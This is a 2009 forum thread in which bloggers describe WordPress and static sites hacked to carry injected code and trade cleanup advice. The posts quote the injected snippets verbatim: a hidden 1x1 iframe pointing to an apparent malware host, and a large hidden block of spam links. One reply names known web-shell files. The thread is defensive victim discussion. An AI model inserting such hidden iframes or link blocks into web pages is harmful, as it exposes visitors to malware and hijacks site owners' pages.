1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Blogs Hacked

Discussion in 'Blogging' started by Mage, Apr 4, 2009.

  1. Mage

    Mage Junior Member

    Joined:
    Jan 31, 2008
    Messages:
    150
    Likes Received:
    18
    Over the last few days, a good friend of mine who has built some 50 auto blogs,found most of the blogs hacked. Despite reinstalling wp, the problems still persisted and she even found some of her blogs listed as "warning" sites in Google.

    I guess wordpress has its weakness even for 2.7. But I found that even static pages had the problem. Some had the following added to the page after they blanked the page.

    <font face=Arial size=3 color=#F0EEEC><a href=http://eroticXXweb.ru>ïîðíî</a></font></p><iframe frameborder=0 border=0 height=1 width=1 src="http://bublik.biz/in.cgi?2" /></body>
    </html>

    She's really upset as she's been working hard to try earn some money to pay for some medical bills of a family member. Some of her sites have PR and thousands of pages indexed.

    Anyone has had similar problems before?
     
  2. istuff

    istuff Junior Member

    Joined:
    Mar 2, 2009
    Messages:
    138
    Likes Received:
    47
    Occupation:
    Cookie Stuffing
    Location:
    Toronto
    Something is probably wrong with her host. Maybe there not secure enough. You can build a site at www.blazingblogs.net

    It allows you to put your own adsense/ypn and its free
     
  3. The Scarlet Pimp

    The Scarlet Pimp Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 2, 2008
    Messages:
    788
    Likes Received:
    3,129
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    1. who is she hosting with?

    2. perhaps she should switch to joomla or drupal.
     
  4. RevolWerx

    RevolWerx Newbie

    Joined:
    Oct 28, 2008
    Messages:
    38
    Likes Received:
    13
    Occupation:
    Network Administrator
    Location:
    NJ
    Home Page:
    1. Change hosting account password.
    2. Change the password for ftp access on all accounts.
    3. Change database passwords and update WordPress wp-config.php files.
    3. Use strong passwords and non guessable user names.
    4. Secure wp-admin folder via .htaccess to only allow her IP to access that area.
    5. in WordPess create new user with Administrator permissions and use a Nick name not related to the account name, copy posts to that new user account, then delete the admin account.
    6. Check log files for evidence and block those IP's if possible.
     
    • Thanks Thanks x 1
  5. Maxell

    Maxell Regular Member

    Joined:
    May 10, 2007
    Messages:
    456
    Likes Received:
    563
    if someone has already uploaded a shell, then doesnt matter how many times to change the password, they will keep doing regardless of your password, check for the logs to see which files are being accessed.. its difficult but she will have to check all folder to find any suspecious files e.g. r57.php c100shell.php etc..
     
  6. Mage

    Mage Junior Member

    Joined:
    Jan 31, 2008
    Messages:
    150
    Likes Received:
    18
    You're right. Even when she changes passwords and removes any unknown files it comes back in another form. Most of the sites on checking with whois have russian servers.

    It's really an awakening for me as I have heard of this kind of thing but not actually seen it happen. She only started noticing when she found her clickbank sales going to zero for a few days.

    Anyone doing wp especially autoblogs should take care as it is very depressing to suddenly find all your blogs and income gone.

    The question I have for those of you who know computing is, is it safe to reinstall using the present database? It is just too difficult to look for all those .php files as there are so many hiding everywhere.
     
  7. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    I have the same problem also.
    Not all blogs affected. Some.
    Nothing to do with same host or not.
    I think they just randomly pick wordpress and hack through some security loophope.
     
  8. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    It added code like below to the footer of blogs.
    Removed and next day it automatically added again.
    Help needed!!! Please!!!

    <!-- c822c1b63853ed273b89687ac505f9fa --><u style="display: none;"><a href="http://www.qualitydentistry.com/forms/z/fancy.htm">fancy</a>, <a href="http://www.tamagika.com/h/transporte.htm">transporte</a>, <a href="http://www.qualitydentistry.com/forms/z/butternut.htm">butternut</a>, <a href="http://www.qualitydentistry.com/forms/z/cocktail.htm">cocktail</a>, <a href="http://www.tamagika.com/h/sweat.htm">sweat</a>, <a href="http://www.qualitydentistry.com/forms/z/stato.htm">stato</a>, <a href="http://www.tamagika.com/h/frases.htm">frases</a>, <a href="http://www.qualitydentistry.com/forms/z/girlfriend.htm">girlfriend</a>, <a href="http://www.tamagika.com/h/dies.htm">dies</a>, <a href="http://www.tamagika.com/h/anaerobic.htm">anaerobic</a>, <a href="http://www.qualitydentistry.com/forms/z/stoves.htm">stoves</a>, <a href="http://www.qualitydentistry.com/forms/z/melbourne.htm">melbourne</a>, <a href="http://www.tamagika.com/h/3g.htm">3g</a>, <a href="http://www.tamagika.com/h/capo.htm">capo</a>, <a href="http://www.tamagika.com/h/crucible.htm">crucible</a>, <a href="http://www.qualitydentistry.com/forms/z/semanas.htm">semanas</a>, <a href="http://www.qualitydentistry.com/forms/z/gibbons.htm">gibbons</a>, <a href="http://www.qualitydentistry.com/forms/z/jade.htm">jade</a>, <a href="http://www.qualitydentistry.com/forms/z/epic.htm">epic</a>, <a href="http://www.tamagika.com/h/lipstick.htm">lipstick</a>, <a href="http://www.qualitydentistry.com/forms/z/maurice.htm">maurice</a>, <a href="http://www.qualitydentistry.com/forms/z/wasted.htm">wasted</a>, <a href="http://www.qualitydentistry.com/forms/z/kann.htm">kann</a>, <a href="http://www.tamagika.com/h/volt.htm">volt</a>, <a href="http://www.tamagika.com/h/soho.htm">soho</a>, <a href="http://www.qualitydentistry.com/forms/z/fiona.htm">fiona</a>, <a href="http://www.tamagika.com/h/consejos.htm">consejos</a>, <a href="http://www.qualitydentistry.com/forms/z/buttocks.htm">buttocks</a>, <a href="http://www.tamagika.com/h/ku.htm">ku</a>, <a href="http://www.tamagika.com/h/localhost.htm">localhost</a>, <a href="http://www.tamagika.com/h/bisquick.htm">bisquick</a>, <a href="http://www.qualitydentistry.com/forms/z/valid.htm">valid</a>, <a href="http://www.qualitydentistry.com/forms/z/fusker.htm">fusker</a>, <a href="http://www.tamagika.com/h/woodpecker.htm">woodpecker</a>, <a href="http://www.tamagika.com/h/107.htm">107</a>, <a href="http://www.tamagika.com/h/22.htm">22</a>, <a href="http://www.tamagika.com/h/verb.htm">verb</a>, <a href="http://www.qualitydentistry.com/forms/z/hommes.htm">hommes</a>, <a href="http://www.qualitydentistry.com/forms/z/disneychannel.htm">disneychannel</a>, <a href="http://www.qualitydentistry.com/forms/z/implementing.htm">implementing</a>, <a href="http://www.tamagika.com/h/bryan.htm">bryan</a>, <a href="http://www.bbc.co.uk">BBC.co.uk</a>, <a href="http://www.berkeley.edu/">Berkeley.edu</a>, <a href="http://www.blogger.com/">Blogger.com</a>, <a href="http://www.qualitydentistry.com/forms/z/dix.htm">dix</a>, <a href="http://www.tamagika.com/h/contracting.htm">contracting</a>, <a href="http://www.bloglines.com/">Bloglines.com</a>, <a href="http://www.qualitydentistry.com/forms/z/squares.htm">squares</a>, <a href="http://www.tamagika.com/h/cheltenham.htm">cheltenham</a>, <a href="http://www.tamagika.com/h/girdles.htm">girdles</a>, <a href="http://www.tamagika.com/h/tony.htm">tony</a>, <a href="http://www.qualitydentistry.com/forms/z/prophecies.htm">prophecies</a>, <a href="http://www.qualitydentistry.com/forms/z/telcel.htm">telcel</a>, <a href="http://www.qualitydentistry.com/forms/z/bicycles.htm">bicycles</a>, <a href="http://www.tamagika.com/h/bobbie.htm">bobbie</a>, <a href="http://www.tamagika.com/h/boyfriends.htm">boyfriends</a>, <a href="http://www.qualitydentistry.com/forms/z/kunst.htm">kunst</a>, <a href="http://www.qualitydentistry.com/forms/z/belleville.htm">belleville</a>, <a href="http://www.qualitydentistry.com/forms/z/tunisie.htm">tunisie</a>, <a href="http://www.tamagika.com/h/kirsten.htm">kirsten</a>, <a href="http://www.qualitydentistry.com/forms/z/wenn.htm">wenn</a>, <a href="http://www.tamagika.com/h/spatial.htm">spatial</a>, <a href="http://www.qualitydentistry.com/forms/z/plow.htm">plow</a>, <a href="http://www.tamagika.com/h/baru.htm">baru</a>, <a href="http://www.tamagika.com/h/ounce.htm">ounce</a>, <a href="http://www.qualitydentistry.com/forms/z/hymen.htm">hymen</a>, <a href="http://www.brown.edu/">Brown.edu</a>, <a href="http://www.qualitydentistry.com/forms/z/rinks.htm">rinks</a>, <a href="http://www.qualitydentistry.com/forms/z/definitions.htm">definitions</a>, <a href="http://www.qualitydentistry.com/forms/z/hentia.htm">hentia</a>, <a href="http://www.qualitydentistry.com/forms/z/nn.htm">nn</a>, <a href="http://www.tamagika.com/h/away.htm">away</a>, <a href="http://www.tamagika.com/h/agri.htm">agri</a>, <a href="http://www.qualitydentistry.com/forms/z/triangle.htm">triangle</a>, <a href="http://www.qualitydentistry.com/forms/z/diarios.htm">diarios</a>, <a href="http://www.bu.edu/">BU.edu</a>, <a href="http://www.tamagika.com/h/jre.htm">jre</a>, <a href="http://www.qualitydentistry.com/forms/z/strasbourg.htm">strasbourg</a>, <a href="http://www.cam.ac.uk/">Cam.ac.uk</a>, <a href="http://www.qualitydentistry.com/forms/z/royce.htm">royce</a>, <a href="http://www.tamagika.com/h/actuales.htm">actuales</a>, <a href="http://www.qualitydentistry.com/forms/z/giro.htm">giro</a>, <a href="http://www.tamagika.com/h/shagging.htm">shagging</a>, <a href="http://www.qualitydentistry.com/forms/z/smoker.htm">smoker</a>, <a href="http://www.tamagika.com/h/toolbar.htm">toolbar</a>, <a href="http://www.tamagika.com/h/preferred.htm">preferred</a>, <a href="http://www.qualitydentistry.com/forms/z/era.htm">era</a>, <a href="http://www.qualitydentistry.com/forms/z/offices.htm">offices</a>, <a href="http://www.qualitydentistry.com/forms/z/sheena.htm">sheena</a>, <a href="http://www.cbc.ca/">CBC.ca</a>, <a href="http://www.qualitydentistry.com/forms/z/wb.htm">wb</a>, <a href="http://www.qualitydentistry.com/forms/z/albert.htm">albert</a>, <a href="http://www.qualitydentistry.com/forms/z/computador.htm">computador</a>, <a href="http://www.cern.ch/">CERN.ch</a>, <a href="http://www.cmu.edu/">CMU.edu</a>, <a href="http://www.qualitydentistry.com/forms/z/newsgroup.htm">newsgroup</a>, <a href="http://www.tamagika.com/h/bibliotheek.htm">bibliotheek</a>, <a href="http://www.qualitydentistry.com/forms/z/cazare.htm">cazare</a>, <a href="http://www.cnet.com/">CNET.com</a>, <a href="http://www.qualitydentistry.com/forms/z/al.htm">al</a>, <a href="http://www.tamagika.com/h/erin.htm">erin</a>, </u><!-- c822c1b63853ed273b89687ac505f9fa -->
     
  9. alderous

    alderous Regular Member Premium Member

    Joined:
    Jul 23, 2007
    Messages:
    325
    Likes Received:
    74
    you need to reset your SQL! otherwise itll keep coming back.
     
  10. soctal

    soctal Regular Member

    Joined:
    Jul 28, 2008
    Messages:
    243
    Likes Received:
    76
    i remember reading a tip from the tim ferris book 4-hour workweek when he suggested since hosting is so economical you should keep your sites backed up and duplicated on another host so if you are ever hacked you can just move it to the duplicated site. there is a service you can move your domain in 5 minutes instead of the usual 24 hours or something like that.
    its one of those things i plan to do with at least the most crucial sites once i actually started to make money.
     
  11. soctal

    soctal Regular Member

    Joined:
    Jul 28, 2008
    Messages:
    243
    Likes Received:
    76
    I cant seem to delete this duplicated post. I'll have to ask the mod how to do that.
     
    Last edited: Apr 5, 2009
  12. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    can you explain more detail?
    You said everything without any links or crucial information.
    what service is that?
    any details steps on yur plan?
    thanks!
     
  13. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    most of the peoples using cheap hosting providers for this type of '' jobs '' like autoblogs , thing is ... cheap price bring with him always weakness , more than than most of the peoples aren't using any antivirus nor any security tool to protect computers , what's the problem there ? it's seems some guy's just got access to your hosting accounts / wp admin and passwords and so on ... there's nothing to do better just clean first of all your computers & try to use an strong antivirus sollutions ( personal always prefer mcafee - and I didn't got my computers viruses since '99 :) .... ) second step is to take a look and make your homework about the '' right hosting company '' , allways try to avoid '' free hosting accounts '' ( except the enstablished and well known for their good reputation like free wordpress.org hostings , blogger , and so on ... ) other ways just go for some shared hosting accounts even if they are cheap you can use some reputable hosting companies , changing all passwords ( from email accounts , online bank accounts , everything ... ) when you have an clean computer it's a must at this point . Start to re-make all those blogs/splogs/autoblogs like you wish to name .... try to use decent passwords combo's , avoid to use one password for all your accounts ( for example never use same password from email adress like password for hosting accounts , or wp admin ... ) securing the ./wp-admin/ via htaccess is also a good way to protect them , and most important ... learn the lessons :)
     
    • Thanks Thanks x 1
  14. Maxell

    Maxell Regular Member

    Joined:
    May 10, 2007
    Messages:
    456
    Likes Received:
    563
    check wp-config.php file, since its writeable most of the hackers add this code at the end of this file.
     
  15. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    it's added at the footer.php file.
    i don think they hack into server or personal pc for password or anything.
    i have same setting for a few blogs, under same host.
    20% affected, the rest okay. same plugin, same login.
    i think they randomly search for wordpress blogs and put in some code to hack it.
    it seems like the hack will automatically recover itself whenever it notice the spam links were removed.
     
  16. falcommoney

    falcommoney Junior Member

    Joined:
    Jan 11, 2009
    Messages:
    127
    Likes Received:
    62
    Scan the computer, your friend might be infected.
     
  17. Carnagge

    Carnagge Registered Member

    Joined:
    Dec 23, 2007
    Messages:
    97
    Likes Received:
    9
    I know what it is - we have problem with this and discuss on other forum.

    It's some kind of troyan/virus which stole your password to ftp access which you have written on your computer - mainly form Total Commander. Change passwords and use filezilla.
    Scan also your PC and try to find this bustards.
     
  18. FreeTheTV

    FreeTheTV BANNED BANNED

    Joined:
    Mar 1, 2009
    Messages:
    561
    Likes Received:
    1,198
    Blogger > Wordpress.
     
  19. iglow

    iglow Elite Member

    Joined:
    Feb 20, 2009
    Messages:
    2,080
    Likes Received:
    856
    Home Page:
    no its not about passwd. its a known vulnerability in wordpress. update to latest version + find the code pasted atm and delate.
     
  20. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    Having the latest wordpress 2.7.1
    Having the same problem as well.